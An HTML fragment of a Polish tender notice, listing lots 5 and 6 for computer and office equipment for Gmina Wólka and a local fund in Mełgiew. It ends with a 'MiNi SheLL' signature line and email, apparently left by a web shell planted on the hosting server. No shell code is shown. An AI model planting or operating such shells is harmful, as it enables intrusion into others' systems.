<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> GMINA WÓLKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Gmina Wólka miejsce dostawy: Urząd Gminy Wólka - Jakubowice Murowane 8, 20-258 Lublin,
b)	Opis przedmiotu zamówienia:
-	Komputer przenośny typu B - 5 sztuk
-	Projektor multimedialny - 2 sztuki
-	Urządzenie wielofunkcyjne typu C - 1 sztuka
-	Drukarka - 1 sztuka
-	Aparat fotograficzny typu B - 1 sztuka
-	Telefax - 1 sztuka
-	Ekran projekcyjny - 2 sztuki
-	Komplet kolumn - 2 sztuki
-	Oprogramowanie - pakiety biurowe - 5 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.31.00-6, 30.21.30.00-5, 30.12.14.10-0, 38.65.10.00-3, 38.65.16.00-9, 48.00.00.00-8, 48.62.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> FUNDUSZ LOKALNY IM. JANA III SOBIESKIEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Fundusz Lokalny im. Jana III Sobieskiego miejsce dostawy: Urząd Gminy Mełgiew - ul. Partyzancka 2, 21-007 Mełgiew,
b)	Opis przedmiotu zamówienia:
-	Komputer przenośny typu B - 6 sztuk
-	Projektor multimedialny - 1 sztuka
-	Urządzenie wielofunkcyjne typu C - 1 sztuka
-	Aparat fotograficzny typu B - 1 sztuka
-	Telefax - 1 sztuka
-	Ekran projekcyjny - 1 sztuka
-	Oprogramowanie - pakiety biurowe - 6 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.31.00-6, 30.21.30.00-5, 30.12.14.10-0, 38.65.10.00-3, 38.65.16.00-9, 48.00.00.00-8, 48.62.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com